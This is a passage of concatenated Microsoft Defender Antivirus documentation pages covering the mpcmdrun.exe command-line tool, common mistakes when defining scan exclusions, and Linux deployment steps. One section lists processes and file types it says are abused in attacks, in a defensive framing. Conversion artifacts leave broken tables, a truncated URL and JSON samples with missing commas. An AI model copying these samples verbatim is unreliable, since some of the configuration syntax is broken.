security Command Line Arguments Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus.md
- Title: Use the command line to manage Microsoft Defender Antivirus
-description: Run Microsoft Defender Antivirus scans and configure next-generation protection with a dedicated command-line utility.
------ Previously updated : 06/06/2023----- m365-security-- tier3-- mde-ngp--
-# Configure and manage Microsoft Defender Antivirus with the mpcmdrun.exe command-line tool
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus -
-**Platforms**
-- Windows-
-You can perform various functions in Microsoft Defender Antivirus using the dedicated command-line tool **mpcmdrun.exe**. This utility is useful when you want to automate Microsoft Defender Antivirus tasks. You can find the utility in `%ProgramFiles%\Windows Defender\MpCmdRun.exe`. Run it from a command prompt.
-
-> [!TIP]
-> You might need to open an administrator-level version of the command prompt. When you search for **Command Prompt** on the Start menu, choose **Run as administrator**. If you're running an updated Microsoft Defender antimalware platform version, run `MpCmdRun` from the following location: `C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>`. For more information about the antimalware platform, see [Microsoft Defender Antivirus updates and baselines](microsoft-defender-antivirus-updates.md).
-
-The MpCmdRun utility uses the following syntax:
-
-```console
-MpCmdRun.exe [command] [-options]
-```
-
-Here's an example:
-
-```console
-MpCmdRun.exe -Scan -ScanType 2
-```
-
-In our example, the MpCmdRun utility starts a full antivirus scan on the device.
-
-## Commands
-
-|Command|Description|
-|||
-|`-?` **or** `-h`|Displays all available options for the MpCmdRun tool|
-|`-Scan [-ScanType [<value>]] [-File <path> [-DisableRemediation] [-BootSectorScan] [-CpuThrottling]] [-Timeout <days>] [-Cancel]`|Scans for malicious software. Values for **ScanType** are:<p>**0** Default, according to your configuration<p>**1** Quick scan<p>**2** Full scan<p>**3** File and directory custom scan.<p>CpuThrottling runs according to policy configurations.|
-|`-Trace [-Grouping #] [-Level #]`|Starts diagnostic tracing|
-|`-CaptureNetworkTrace -Path <path>`|Captures all the network input into the Network Protection service and saves it to a file at `<path>`. <br/>Supply an empty path to stop tracing.|
-|`-GetFiles [-SupportLogLocation <path>]`|Collects support information. See [collecting diagnostic data](collect-diagnostic-data.md).|
-|`-GetFilesDiagTrack`|Same as `-GetFiles`, but outputs to temporary DiagTrack folder.|
-|`-RemoveDefinitions [-All]`|Restores the installed security intelligence to a previous backup copy or to the original default set.|
-|`-RemoveDefinitions [-DynamicSignatures]`|Removes only the dynamically downloaded security intelligence.|
-|`-RemoveDefinitions [-Engine]`|Restores the previous installed engine.|
-|`-SignatureUpdate [-UNC \|-MMPC]`|Checks for new security intelligence updates.|
-|`-Restore [-ListAll \|[[-Name <name>] [-All] \|[-FilePath <filePath>]] [-Path <path>]]`|Restores or lists quarantined item(s).|
-|`-AddDynamicSignature [-Path]`|Loads dynamic security intelligence.|
-|`-ListAllDynamicSignatures`|Lists the loaded dynamic security intelligence.|
-|`-RemoveDynamicSignature [-SignatureSetID]`|Removes dynamic security intelligence.|
-|`-CheckExclusion -path <path>`|Checks whether a path is excluded.|
-|`-ValidateMapsConnection`|Verifies that your network can communicate with the Microsoft Defender Antivirus cloud service. This command will only work on Windows 10, version 1703 or higher.|
-|`-ResetPlatform`| Reset platform binaries back to `%ProgramFiles%\Windows Defender`.|
-|`-RevertPlatform`| Revert platform binaries back to the previously installed version of the Defender platform.|
-
-## Common errors in running commands via mpcmdrun.exe
-
-The following table lists common errors that can occur while using the MpCmdRun tool.
-
-|Error message|Possible reason|
-|||
-|**ValidateMapsConnection failed (800106BA)** or **0x800106BA**|The Microsoft Defender Antivirus service is disabled. Enable the service and try again. If you need help re-enabling Microsoft Defender Antivirus, see [Reinstall/enable Microsoft Defender Antivirus on your endpoints](switch-to-mde-phase-2.md#step-1-reinstallenable-microsoft-defender-antivirus-on-your-endpoints).<p> Note that in Windows 10 1909 or older, and Windows Server 2019 or older, the service was formerly called *Windows Defender Antivirus*.|
-|**0x80070667**|You're running the `-ValidateMapsConnection` command from a computer that is Windows 10 version 1607 or older, or Windows Server 2016 or older. Run the command from a machine that is Windows 10 version 1703 or newer, or Windows Server 2019 or newer.|
-|**MpCmdRun is not recognized as an internal or external command, operable program, or batch file.**|The tool must be run from either `%ProgramFiles%\Windows Defender` or `C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2012.4-0` (where `2012.4-0` might differ since platform updates are monthly except for March)|
-|**ValidateMapsConnection failed to establish a connection to MAPS (hr=80070005 httpcode=450)**|The command was attempted using insufficient privileges. Use the command prompt (cmd.exe) as an administrator.|
-|**ValidateMapsConnection failed to establish a connection to MAPS (hr=80070006 httpcode=451)**|The firewall is blocking the connection or conducting SSL inspection.|
-|**ValidateMapsConnection failed to establish a connection to MAPS (hr=80004005 httpcode=450)**|Possible network-related issues, like name resolution problems|
-|**ValidateMapsConnection failed to establish a connection to MAPS (hr=0x80508015**|The firewall is blocking the connection or conducting SSL inspection.|
-|**ValidateMapsConnection failed to establish a connection to MAPS (hr=800722F0D**|The firewall is blocking the connection or conducting SSL inspection.|
-|**ValidateMapsConnection failed to establish a connection to MAPS (hr=80072EE7 httpcode=451)**|The firewall is blocking the connection or conducting SSL inspection.|
-
-## See also
--- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-- [Configure Microsoft Defender Antivirus features](configure-microsoft-defender-antivirus-features.md)-- [Configure and validate Microsoft Defender Antivirus network connections](configure-network-connections-microsoft-defender-antivirus.md)-- [Reference topics for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md)-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Common Exclusion Mistakes Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus.md
- Title: Common mistakes to avoid when defining exclusions
-description: Avoid common mistakes when defining exclusions for Microsoft Defender Antivirus scans.
-------- Previously updated : 07/18/2023--- m365-security-- tier2-- mde-ngp--
-# Common mistakes to avoid when defining exclusions
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender for Endpoint Plan 1-- Microsoft Defender Antivirus -
-**Platforms**
--- Windows-- macOS-- Linux-
-> [!IMPORTANT]
-> **Add exclusions with caution**. Exclusions for Microsoft Defender Antivirus scans reduce the level of protection for devices.
-
-You can define an exclusion list for items that you don't want Microsoft Defender Antivirus to scan. However, excluded items could contain threats that make your device vulnerable. This article describes some common mistakes that you should avoid when defining exclusions.
-
-> [!TIP]
-> Before defining your exclusion lists, see [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and review the detailed information in [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
-
-## Excluding certain trusted items
-
-Certain files, file types, folders, or processes shouldn't be excluded from scanning even though you trust that they're not malicious. Don't define exclusions for the folder locations, file extensions, and processes that are listed in the following sections:
--- [Folder locations](#folder-locations)-- [File extensions](#file-extensions)-- [Processes](#processes)-
-### Folder locations
-
-> [!IMPORTANT]
-> Certain folders shouldn't be excluded from scans because they can end up being folders where malicious files can get dropped.
-
-In general, don't define exclusions for any of the following folder locations:
--- `%systemdrive%`-- `C:`, `C:\`, or `C:\*`-- `%ProgramFiles%\Java` or `C:\Program Files\Java`-- `%ProgramFiles%\Contoso\`, `C:\Program Files\Contoso\`, `%ProgramFiles(x86)%\Contoso\`, or `C:\Program Files (x86)\Contoso\`-- `C:\Temp`, `C:\Temp\`, or `C:\Temp\*`-- `C:\Users\` or `C:\Users\*`-- `C:\Users\<UserProfileName>\AppData\Local\Temp\` or `C:\Users\<UserProfileName>\AppData\LocalLow\Temp\`. **Note the following important exceptions for SharePoint**: **Do exclude** `C:\Users\ServiceAccount\AppData\Local\Temp` or `C:\Users\Default\AppData\Local\Temp` when you use [file-level antivirus protection in SharePoint](https://support.microsoft.com/office/certain-folders-may-have-to-be-excluded-from-antivirus-scanning-when-you-use-file-level-antivirus-software-in-sharepoint-01cbc532-a24e-4bba-8d67-0b1ed733a3d9).-- `%Windir%\Prefetch`, `C:\Windows\Prefetch`, `C:\Windows\Prefetch\`, or `C:\Windows\Prefetch\*`-- `%Windir%\System32\Spool` or `C:\Windows\System32\Spool`-- `C:\Windows\System32\CatRoot2`-- `%Windir%\Temp`, `C:\Windows\Temp`, `C:\Windows\Temp\`, or `C:\Windows\Temp\*`-
-#### Linux and macOS Platforms
-
-In general, don't define exclusions for the following folder locations:
--- `/`-- `/bin` or `/sbin`-- `/usr/lib`-
-### File extensions
-
-> [!IMPORTANT]
-> Certain file extensions shouldn't be excluded because they can be file types that are used in an attack.
-
-In general, don't define exclusions for the following file extensions:
--- `.7z`-- `.bat`-- `.bin`-- `.cab`-- `.cmd`-- `.com`-- `.cpl`-- `.dll`-- `.exe`-- `.fla`-- `.gif`-- `.gz`-- `.hta`-- `.inf`-- `.java`-- `.jar`-- `.job`-- `.jpeg`-- `.jpg`-- `.js`-- `.ko` or `.ko.gz`-- `.msi`-- `.ocx`-- `.png`-- `.ps1`-- `.py`-- `.rar`-- `.reg`-- `.scr`-- `.sys`-- `.tar`-- `.tmp`-- `.url`-- `.vbe`-- `.vbs`-- `.wsf`-- `.zip`-
-### Processes
-
-> [!IMPORTANT]
-> Certain processes shouldn't be excluded because they get used during attacks.
-
-In general, don't define exclusions for the following processes:
--- `AcroRd32.exe`-- `addinprocess.exe`-- `addinprocess32.exe`-- `addinutil.exe`-- `bash.exe`-- `bginfo.exe`-- `bitsadmin.exe`-- `cdb.exe`-- `csi.exe`-- `cmd.exe`-- `cscript.exe`-- `dbghost.exe`-- `dbgsvc.exe`-- `dnx.exe`-- `dotnet.exe`-- `excel.exe`-- `fsi.exe`-- `fsiAnyCpu.exe`-- `iexplore.exe`-- `java.exe`-- `kd.exe`-- `lxssmanager.dll`-- `msbuild.exe`-- `mshta.exe`-- `ntkd.exe`-- `ntsd.exe`-- `outlook.exe`-- `psexec.exe`-- `powerpnt.exe`-- `powershell.exe`-- `rcsi.exe`-- `svchost.exe`-- `schtasks.exe`-- `system.management.automation.dll`-- `windbg.exe`-- `winword.exe`-- `wmic.exe`-- `wscript.exe`-- `wuauclt.exe`-
-> [!NOTE]
-> You can choose to exclude file types, such as `.gif`, `.jpg`, `.jpeg`, or `.png` if your environment has a modern, up-to-date software with a strict update policy to handle any vulnerabilities.
-
-#### Linux and macOS Platforms
-
-In general, don't define exclusions for the following processes:
--- `bash`-- `java`-- `python` and `python3`-- `sh`-- `zsh`-
-## Using just the file name in the exclusion list
-
-Malware might have the same name as that of a file that you trust and want to exclude from scanning. Therefore, to avoid excluding potential malware from scanning, use a fully qualified path to the file that you want to exclude instead of using just the file name. For example, if you want to exclude `Filename.exe` from scanning, use the complete path to the file, such as `C:\program files\contoso\Filename.exe`.
-
-## Using a single exclusion list for multiple server workloads
-
-Don't use a single exclusion list to define exclusions for multiple server workloads. Split the exclusions for different application or service workloads into multiple exclusion lists. For example, the exclusion list for your IIS Server workload must be different from the exclusion list for your SQL Server workload.
-
-## Using incorrect environment variables as wildcards in the file name and folder path or extension exclusion lists
-
-Microsoft Defender Antivirus Service runs in system context using the LocalSystem account, which means it gets information from the system environment variable, and not from the user environment variable. Use of environment variables as a wildcard in exclusion lists is limited to system variables and those applicable to processes running as an NT AUTHORITY\SYSTEM account. Therefore, don't use user environment variables as wildcards when adding Microsoft Defender Antivirus folder and process exclusions. See the table under [System environment variables](configure-extension-file-exclusions-microsoft-defender-antivirus.md#system-environment-variables) for a complete list of system environment variables.
-
-See [Use wildcards in the file name and folder path or extension exclusion lists](configure-extension-file-exclusions-microsoft-defender-antivirus.md#use-wildcards-in-the-file-name-and-folder-path-or-extension-exclusion-lists) for information on how to use wildcards in exclusion lists.
-
-## See also
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Configure custom exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md)-- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md)--
security Comprehensive Guidance On Linux Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/comprehensive-guidance-on-linux-deployment.md
- Title: Advanced deployment guidance for Microsoft Defender for Endpoint on Linux
-description: Learn how to deploy Defender for Endpoint on Linux and address issues such as high cpu utilization
------- m365-security-- tier3-- mde-linux-- Previously updated : 04/04/2024--
-# Advanced deployment guidance for Microsoft Defender for Endpoint on Linux
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article provides advanced deployment guidance for Microsoft Defender for Endpoint on Linux. You get a brief summary of the deployment steps, learn about the system requirements, then be guided through the actual deployment steps. You'll also learn how to verify that the device has been correctly onboarded.
-
-For information about Microsoft Defender for Endpoint capabilities, see [Advanced Microsoft Defender for Endpoint capabilities](#advanced-microsoft-defender-for-endpoint-capabilities).
-
-To learn about other ways to deploy Microsoft Defender for Endpoint on Linux, see:
--- [Manual deployment](linux-install-manually.md)-- [Puppet based deployment](linux-install-with-puppet.md)-- [Ansible based deployment](linux-install-with-ansible.md)-- [Deploy Defender for Endpoint on Linux with Chef](linux-deploy-defender-for-endpoint-with-chef.md)-
-## Deployment summary
-
-Learn about the general guidance on a typical Microsoft Defender for Endpoint on Linux deployment. The applicability of some steps is determined by the requirements of your Linux environment.
-
-1. [Work with your Firewall, Proxy, and Networking admin](#1-work-with-your-firewall-proxy-and-networking-admin).
-
-2. [Capture performance data from the endpoint](#2-capture-performance-data-from-the-endpoint).
-
- > [!NOTE]
- > Consider doing the following optional items, even though they are not Microsoft Defender for Endpoint specific, they tend to improve performance in Linux systems.
-
-3. [(Optional) Check for filesystem errors 'fsck' (akin to chkdsk)](#3-optional-check-for-filesystem-errors-fsck-akin-to-chkdsk).
-
-4. [(Optional) Update storage subsystem drivers](#4-optional-update-storage-subsystem-drivers).
-
-5. [(Optional) Update nic drivers](#5-optional-update-nic-drivers).
-
-6. [Confirm system requirements and resource recommendations are met](#6-confirm-system-requirements-and-resource-recommendations-are-met).
-
-7. [Add your existing solution to the exclusion list for Microsoft Defender Antivirus](#7-add-your-existing-solution-to-the-exclusion-list-for-microsoft-defender-antivirus).
-
-8. [Review important points about exclusions](#8-keep-the-following-points-about-exclusions-in-mind).
-
-9. [Create Device Groups](#9-create-device-groups).
-
-10. [Configure Microsoft Defender for Endpoint on Linux antimalware settings](#10-configure-microsoft-defender-for-endpoint-on-linux-antimalware-settings).
-
-11. [Download the Microsoft Defender for Endpoint on Linux onboarding package from the Microsoft Defender portal](#11-download-the-microsoft-defender-for-endpoint-on-linux-onboarding-package).
-
-12. [Use Ansible, Puppet, or Chef to manage Microsoft Defender for Endpoint on Linux](#12-ansible-puppet-and-chef-examples-to-manage-microsoft-defender-for-endpoint-on-linux).
-
-13. [Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux](#13-troubleshoot-installation-issues-for-microsoft-defender-for-endpoint-on-linux).
-
-14. [Check resource utilization statistics and report on predeployment utilization compared to post-deployment](#14-check-resource-utilization-statistics).
-
-15. [Verify communication with Microsoft Defender for Endpoint backend](#15-verify-communication-with-microsoft-defender-for-endpoint-backend).
-
-16. [Investigate agent health issues](#16-investigate-agent-health-issues).
-
-17. [Verify that you're able to get "Platform Updates" (agent updates)](#17-verify-that-youre-able-to-get-platform-updates-agent-updates).
-
-18. [Verify that you're able to get "Security Intelligence Updates" (signatures/definition updates)](#18-verify-that-youre-able-to-get-security-intelligence-updates-signaturesdefinition-updates).
-
-19. [Test detections](#19-test-detections).
-
-20. [Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux](#20-troubleshoot-missing-events-or-alerts-issues-for-microsoft-defender-for-endpoint-on-linux).
-
-21. [Troubleshooting High CPU utilization by ISVs, Linux apps, or scripts](#21-troubleshoot-high-cpu-utilization-by-isvs-linux-apps-or-scripts).
-
-22. [Uninstall your non-Microsoft solution](#22-uninstall-your-non-microsoft-solution).
-
-## 1. Work with your Firewall, Proxy, and Networking admin
-
-Work with your Firewall, Proxy, and Networking admin to add the Microsoft Defender for Endpoint URLs to the allowed list, and prevent it from being SSL inspected.
-
-For more information, see, [Troubleshoot cloud connectivity issues](#troubleshoot-cloud-connectivity-issues).
-
-### Network connectivity of Microsoft Defender for Endpoint
-
-Use the following steps to check the network connectivity of Microsoft Defender for Endpoint:
-
-1. See [Allow URLs for the Microsoft Defender for Endpoint traffic](#step-1-allow-urls-for-the-microsoft-defender-for-endpoint-traffic) that are allowed for the Microsoft Defender for Endpoint traffic.
-
-2. If the Linux servers are behind a proxy, then set the proxy settings. For more information, see [Set up proxy settings](#step-2-set-up-proxy-settings).
-
-3. Verify that the traffic isn't being inspected by SSL inspection (TLS inspection). This is the most common network related issue when setting up Microsoft Defender Endpoint, see [Verify SSL inspection isn't being performed on the network traffic](#step-3-verify-ssl-inspection-isnt-being-performed-on-the-network-traffic).
-
-> [!NOTE]
-> It is generally recommended that traffic for Defender for Endpoint is not inspected by SSL inspection (TLS inspection). This applies to all supported operating systems (Windows, Linux, and MacOS).
-
-#### Step 1: Allow URLs for the Microsoft Defender for Endpoint traffic
-
-1. Download the [Microsoft Defender for Endpoint URL list for commercial customers](https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx
-) or the [Microsoft Defender for Endpoint URL list for Gov/GCC/DoD](https://download.microsoft.com/download/6/e-urls-gov.xlsx) for a list of services and their associated URLs that your network must be able to connect.
-
-2. Under **Geography** column, ensure the following checkboxes are selected:
- - EU, or UK, or US
- - WW
- - (Blanks)
-
- > [!NOTE]
- > You should ensure that there are no firewall or network filtering rules that would deny access to these URLs. If there are, you may need to create an allow rule specifically for them.
-
-3. Work with the Firewall/Proxy/Networking admins to allow the relevant URLs.
-
-#### Step 2: Set up proxy settings
-
-If the Linux servers are behind a proxy, use the following settings guidance.
-
-The following table lists the supported proxy settings:
-
-|Supported|Not supported|
-|||
-|Transparent proxy |Proxy autoconfig (PAC, a type of authenticated proxy)|
-|Manual static proxy configuration |Web proxy autodiscovery protocol (WPAD, a type of authenticated proxy)|
--- [Network connections](microsoft-defender-endpoint-linux.md#network-connections)-- [Full configuration profile](../defender-endpoint/linux-preferences.md#full-configuration-profile-example)-- [Static proxy configuration](../defender-endpoint/linux-static-proxy-configuration.md)-- [Troubleshooting connectivity issues in static proxy scenario](linux-support-connectivity.md#troubleshooting-steps-for-environments-with-static-proxy)-
-#### Step 3: Verify SSL inspection isn't being performed on the network traffic
-
-To prevent man-in-the-middle attacks, all Microsoft Azure hosted traffic uses certificate pinning. As a result, SSL inspections by major firewall systems aren't allowed. You have to bypass SSL inspection for Microsoft Defender for Endpoint URLs.
-
-##### Troubleshoot cloud connectivity issues
-
-For more information, see [Troubleshooting cloud connectivity issues for Microsoft Defender for Endpoint on Linux](linux-support-connectivity.md).
-
-## 2. Capture performance data from the endpoint
-
-Capture performance data from the endpoints that have Defender for Endpoint installed. This includes disk space availability on all mounted partitions, memory usage, process list, and CPU usage (aggregate across all cores).
-
-## 3. (Optional) Check for filesystem errors 'fsck' (akin to chkdsk)
-
-Any filesystem could end-up getting corrupt, so before installing any new software, it would be good to install it on a healthy file system.
-
-## 4. (Optional) Update storage subsystem drivers
-
- Newer driver or firmware on a storage subsystem could help with performance and/or reliability.
-
-## 5. (Optional) Update nic drivers
-
-Newer driver/firmware on a NICs or NIC teaming software could help w/ performance and/or reliability.
-
-## 6. Confirm system requirements and resource recommendations are met
-
-The following section provides information on supported Linux versions and recommendations for resources.
-
-For a detailed list of supported Linux distros, see [System requirements](microsoft-defender-endpoint-linux.md#system-requirements).
-
-|Resource|Recommendation|
-|||
-|Disk space |Minimum: 2 GB <br> NOTE: More disk space might be needed if cloud diagnostics are enabled for crash collections. |
-|RAM |1 GB<br> 4 GB is preferred|
-|CPU |If the Linux system is running only one vcpu, we recommend it be increased to two vcpu's<br> 4 cores are preferred |
-
-|OS version|Kernel filter driver|Comments|
-||||
-|RHEL 7.x, RHEL 8.x, and RHEL 9.x |No kernel filter driver, the fanotify kernel option must be enabled|akin to Filter Manager (fltmgr, accessible via `fltmc.exe`) in Windows|
-|RHEL 6.x|TALPA kernel driver|
-
-## 7. Add your existing solution to the exclusion list for Microsoft Defender Antivirus
-
-This step of the setup process involves adding Defender for Endpoint to the exclusion list for your existing endpoint protection solution and any other security products your organization is using. You can choose from several methods to add your exclusions to Microsoft Defender Antivirus.
-
-> [!TIP]
-> To get help configuring exclusions, refer to your solution provider's documentation.
--- Your ability to run Microsoft Defender for Endpoint on Linux alongside a non-Microsoft antimalware product depends on the implementation details of that product. If the other antimalware product uses fanotify, it has to be uninstalled to eliminate performance and stability side effects resulting from running two conflicting agents.--- To check if there's a non-Microsoft antimalware that is running FANotify, you can run `mdatp health`, then check the result:-
- :::image type="content" source="mediatp health result":::
-
- Under "conflicting_applications", if you see a result other than "unavailable", uninstall the non-Microsoft antimalware.
--- If you don't uninstall the non-Microsoft antimalware product, you might encounter unexpected behaviors such as performance issues, stability issues such as systems hanging, or kernel panics.--- To identify the Microsoft Defender for Endpoint on Linux processes and paths that should be excluded in the non-Microsoft antimalware product, run `systemctl status -l mdatp`.-
- Exclude the following processes from the non-Microsoft antimalware product:
-
- `wdavdaemon`<br>
- `crashpad_handler`<br>
- `mdatp_audis_plugin`<br>
- `telemetryd_v2`<br>
-
- Exclude the following paths from the non-Microsoft antimalware product:
-
- `/opt/microsoft/mdatp/`<br>
- `/var/opt/microsoft/mdatp/`<br>
- `/etc/opt/microsoft/mdatp/`<br>
-
-## 8. Keep the following points about exclusions in mind
-
-When you add [exclusions to Microsoft Defender Antivirus scans](/windows/security/threat-protection/microsoft-defender-antivirus/configure-exclusions-microsoft-defender-antivirus), you should add path and process exclusions.
-
-> [!NOTE]
->
-> - Antivirus exclusions apply to the antivirus engine.
-> - Indicators allow/block apply to the antivirus engine.
-
-Keep the following points in mind:
--- *Path exclusions* exclude specific files and whatever those files access.-- *Process exclusions* exclude whatever a process touches, but doesn't exclude the process itself.-- List your process exclusions using their full path and not by their name only. (The name-only method is less secure.)-- If you list each executable as both a path exclusion and a process exclusion, the process and whatever it touches are excluded.-
-> [!TIP]
-> Review "Common mistakes to avoid when defining exclusions", specifically [Folder locations and Processes the sections for Linux and macOS Platforms](/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus#folder-locations).
-
-## 9. Create device groups
-
-Set up your device groups, device collections, and organizational units Device groups, device collections, and organizational units enable your security team to manage and assign security policies efficiently and effectively. The following table describes each of these groups and how to configure them. Your organization might not use all three collection types.
-
-|Collection type|What to do|
-|||
-|[Device groups](/microsoft-365/security/defender-endpoint/machine-groups) (formerly called *machine groups*) enable your security operations team to configure security capabilities, such as automated investigation and remediation. <br/><br/> Device groups are also useful for assigning access to those devices so that your security operations team can take remediation actions if needed. <br/><br/> Device groups are created while the attack was detected and stopped, alerts, such as an "initial access alert," were triggered and appeared in the [Microsoft Defender portal](/microsoft-365/security/defender/microsoft-365-defender).|1. Go to the Microsoft Defender portal (<https://security.microsoft.com>).<br/><br/>2. In the navigation pane on the left, choose **Settings** \> **Endpoints** \> **Permissions** \> **Device groups**.<br/><br/>3. Choose **+ Add device group**.<br/><br/>4. Specify a name and description for the device group.<br/><br/>5. In the **Automation level** list, select an option. (We recommend **Full - remediate threats automatically**.) To learn more about the various automation levels, see [How threats are remediated](/microsoft-365/security/defender-endpoint/automated-investigations#how-threats-are-remediated).<br/><br/>6. Specify conditions for a matching rule to determine which devices belong to the device group. For example, you can choose a domain, OS versions, or even use [device tags](/microsoft-365/security/defender-endpoint/machine-tags).<br/><br/>7. On the **User access** tab, specify roles that should have access to the devices that are included in the device group.<br/><br/>8. Choose **Done**.|
-|[Device collections](/mem/configmgr/core/clients/manage/collections/introduction-to-collections) enable your security operations team to manage applications, deploy compliance settings, or install software updates on the devices in your organization. <br/><br/> Device collections are created by using [Configuration Manager](/mem/configmgr/).|Follow the steps in [Create a collection](/mem/configmgr/core/clients/manage/collections/create-collections#bkmk_create).|
-|[Organizational units](/azure/active-directory-domain-services/create-ou) enable you to logically group objects such as user accounts, service accounts, or computer accounts. <br/><br/> You can then assign administrators to specific organizational units, and apply group policy to enforce targeted configuration settings. <br/><br/> Organizational units are defined in [Microsoft Entra Domain Services](/azure/active-directory-domain-services).|Follow the steps in [Create an Organizational Unit in a Microsoft Entra Domain Services managed domain](/azure/active-directory-domain-services/create-ou).|
-
-## 10. Configure Microsoft Defender for Endpoint on Linux antimalware settings
-
-**Before you begin**:
--- If you're already using a non-Microsoft antimalware product for your Linux servers, consider that you might have to copy the existing exclusions to Microsoft Defender for Endpoint on Linux.--- If you're not using a non-Microsoft antimalware product for your Linux servers, get a list of all your Linux applications and check the vendors website for exclusions.--- If you're running a non-Microsoft antimalware product, add the processes/paths to the Microsoft Defender for Endpoint's antivirus exclusion list. For more information, check the non-Microsoft antimalware documentation or contact their support.--- If you're testing on one machine, you can use a command line to set up the exclusions:
- - [Configure from the command line](linux-resources.md#configure-from-the-command-line).
- - [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md).
--- If you're testing on multiple machines, then use the following `mdatp_managed.json` file. If you're coming from Windows, this like a 'group policy' for Defender for Endpoint on Linux.-
- You can consider modifying the file based on your needs:
-
- ```JSON
- {
- "antivirusEngine":{
- "enforcementLevel":"real_time",
- "scanAfterDefinitionUpdate":true,
- "scanArchives":true,
- "maximumOnDemandScanThreads":1,
- "exclusionsMergePolicy":"merge",
- "exclusions":[
- {
- "$type":"excludedPath",
- "isDirectory":false,
- "path":"/var/log/system.log"
- },
- {
- "$type":"excludedPath",
- "isDirectory":true,
- "path":"/home"
- },
- {
- "$type":"excludedFileExtension",
- "extension":"pdf"
- },
- {
- "$type":"excludedFileName",
- "name":"cat"
- }
- ],
- "allowedThreats":[
- "<EXAMPLE DO NOT USE>EICAR-Test-File (not a virus)"
- ],
- "disallowedThreatActions":[
- "allow",
- "restore"
- ],
- "threatTypeSettingsMergePolicy":"merge",
- "threatTypeSettings":[
- {
- "key":"potentially_unwanted_application",
- "value":"block"
- },
- {
- "key":"archive_bomb",
- "value":"audit"
- }
- ]
- },
- "cloudService":{
- "enabled":true,
- "diagnosticLevel":"optional",
- "automaticSampleSubmissionConsent":"safe",
- "automaticDefinitionUpdateEnabled":true
- "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
- }
- }
- ```
-
- **Recommendations**:
-
- ```JSON
- {
- "antivirusEngine":{
- "enforcementLevel":"real_time",
- "scanAfterDefinitionUpdate":true,
- "scanArchives":true,
- "maximumOnDemandScanThreads":1,
- "exclusionsMergePolicy":"merge",
- "exclusions":[
- {
- "$type":"excludedPath",
- "isDirectory":false,
- "path":"/var/log/system.log"
- },
- {
- "$type":"excludedPath",
- "isDirectory":true,
- "path":"/proc"
- },
- {
- "$type":"excludedPath",
- "isDirectory":true,
- "path":"/sys"
- },
- {
- "$type":"excludedPath",
- "isDirectory":true,
- "path":"/dev"
- },
- {
- "$type":"excludedFileExtension",
- "extension":""
- },
- {
- "$type":"excludedFileName",
- "name":""
- }
- ],
- "allowedThreats":[
- ""
- ],
- "disallowedThreatActions":[
- "allow",
- "restore"
- ],
- "threatTypeSettingsMergePolicy":"merge",
- "threatTypeSettings":[
- {
- "key":"potentially_unwanted_application",
- "value":"block"
- },
- {
- "key":"archive_bomb",
- "value":"audit"
- }
- ]
- },
- "cloudService":{
- "enabled":true,
- "diagnosticLevel":"optional",
- "automaticSampleSubmissionConsent":"safe",
- "automaticDefinitionUpdateEnabled":true
- "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
- }
- }
- ```
-
-> [!NOTE]
-> In Linux (and macOS) we support paths where it starts with a wildcard.
-
-The following table describes the settings that are recommended as part of `mdatp_managed.json` file:
-
-|Settings|Comments|
-|||
-|`exclusionsMergePolicy` being set to `admin_only` |Prevents the local admin from being able to add the local exclusions (via bash (the command prompt)).|
-|`disallowedThreatActions` being set to `allow and restore`|Prevents the local admin from being able to restore a quarantined item (via bash (the command prompt)).|
-|`threatTypeSettingsMergePolicy` being set to `admin_only`|Prevents the local admin from being able to add False Positives or True Positives that are benign to the threat types (via bash (the command prompt)).|
--- Save the setting as `mdatp_managed.json` file.-- Copy the setting to this path `/etc/opt/microsoft/mdatp/managed/`. For more information, see [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md).-- Add your non-Microsoft antimalware processes and paths to the exclusion list from the prior step.-- Verify that you've added your current exclusions from your non-Microsoft antimalware solution to the prior step.-
-### Applications that Microsoft Defender for Endpoint can impact
-
